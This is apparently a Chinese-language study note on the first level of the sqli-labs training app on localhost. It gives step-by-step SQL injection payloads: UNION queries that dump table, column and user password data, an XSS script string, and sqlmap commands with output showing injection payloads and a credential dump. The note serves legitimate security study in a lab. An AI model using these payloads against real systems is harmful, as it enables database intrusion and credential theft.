sqli-labs学习笔记 DAY1

DAY 1

准备工作

1. 安装phpstudy
2. 安装配置sqli-labs

学习笔记

• SQL语句的注释：–, #
• +在URL经过编码后会编码为空格
• SQL语句的查询语句：SELECT column_name,column_name FROM table_name;
• SQL查询的条件限制：SELECT column_name,column_name FROM table_name WHERE conditon;

sqli-labs学习

1. Please input the ID as parameter with numeric value
   • url：localhost/sqli-labs-master/Less-1/
   • 功能尝试：localhost/sqli-labs-master/Less-1/?id=1
   • 猜测：SELECT xxx FROM xxx WHERE id=x;（猜测id为数值型）
   • 尝试注入点：?id=1 and 1=2; --+
     • 原理：形成语句SELECT xxx FROM xxx WHERE id=1 and 1=2; --+;
     • 由于条件不成立，应该不会返回任何结果，则说明存在注入点。
     • 结果：结果显示正常
   • 猜测：SELECT xxx FROM xxx WHERE id=‘x’;（猜测id为文本）
   • 尝试注入点：?id=1’ and 1=2; --+
     • 结果：返回空白，存在注入点
   • 字段数猜解：?id=1’ ORDER BY n; --+（注意空格替换为+，其中n为猜解的字段数，如果报错，则说明猜解大于实际，如此进行二分猜解）
     • 原理：ORDER BY 是按照某一字段排序，可以跟字段名，也可以是字段序号
     • 结果：字段数为3
   • 回显点查询：?id=999’ UNION SELECT 1,2,3; --+
     • 原理：
       1. UNION为联合查询语句，与前面的查询一起返回记录
       2. SELECT 语句直接跟上常量，会把常量直接作为记录返回
     • 注意：前面的id改为一个不存在的记录，防止第一个SELECT语句占用回显点
     • 结果：显示了2和3
   • 查询数据库版本与路径：id=999’ UNION SELECT 1,@@version,@@datadir; --+
     • 原理：@@version显示数据库版本，@@datadir显示数据库文件的绝对路径
   • 查询用户与数据库：id=999’ UNION SELECT 1,user(),database(); --+
   • 查询所有表名：?id=999’ UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema=‘security’; --+
     • 结果：security数据库中的表——emails,referers,uagents,users
   • 查询所有列名：?id=999’ UNION SELECT 1,2,group_concat(column_name) FROM infromation_schema.columns WHERE table_name=‘users’; --+
     • 结果：users表的字段——user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
   • 获得用户名和密码：?id=999’ UNION SELECT 1,group_concat(username),group_concat(password) FROM security.users; --+

     • 结果：

         | username | password   |
         | -------- | --------   |
         | Dumb     | Dumb       |
         | Angelina | I-kill-you |
         | Dummy    | p@assword  |
         | ......   | ......     |
       

   • xss：?id=999’ UNION SELECT 1,"<script>alert(’/xss/’);</script>",3; --+
   • sqlmap使用：
     1. 测试命令：python sqlmap.py
     2. 检测注入点：python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1”
        • -u参数：指定url
        • -p参数：指定某一个参数，只有一个参数可以省略，如python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” -p id
        • 结果：

          Parameter: id (GET)
          
              Type: boolean-based blind
              Title: AND boolean-based blind - WHERE or HAVING clause
              Payload: id=1' AND 2060=2060 AND 'ZMrl'='ZMrl
          
              Type: error-based
              Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
          ause (FLOOR)
              Payload: id=1' AND (SELECT 1251 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SE
          LECT (ELT(1251=1251,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA
          .PLUGINS GROUP BY x)a) AND 'JIIM'='JIIM
          
              Type: AND/OR time-based blind
              Title: MySQL >= 5.0.12 AND time-based blind
              Payload: id=1' AND SLEEP(5) AND 'QAZn'='QAZn
          
              Type: UNION query
              Title: Generic UNION query (NULL) - 3 columns
              Payload: id=-1434' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767871,0x6b504b575852654d52446e4c4c66695279724a6b566551444b4f525a63757861744269644772546f,0x7171717871)-- RGjJ
          ---
          [15:09:24] [INFO] the back-end DBMS is MySQL
          web server operating system: Windows
          web application technology: PHP 5.4.45, Apache 2.4.23
          back-end DBMS: MySQL >= 5.0
          

          从中可以看出注入参数为id，注入点支持基于布尔类型的注入，基于错误回显的注入、时间延迟的盲注还有联合查询。数据库类型为MySQL，操作系统是Windows，服务器类型是PHP5.4与Apache2.4，数据库版本大于5.0。

     3. 获取当前用户与当前数据库：python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” --current-user --current-db
        • current-user参数：获取当前用户
        • current-db参数：获取当前数据库
     4. 查询数据库中的所有表：python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” -D security --tables
        • -D参数：指定当前数据库
        • –tables参数：查询当前数据库所有表
     5. 查询字段名：python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” -D security -T users --columns
        • -T参数：指定当前表
        • –columns参数：查询当前表所有字段名
     6. 查询所有记录：python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” -D security -T users -C “username,password” --dump
        • -C参数：指定字段
        • –dump：查询记录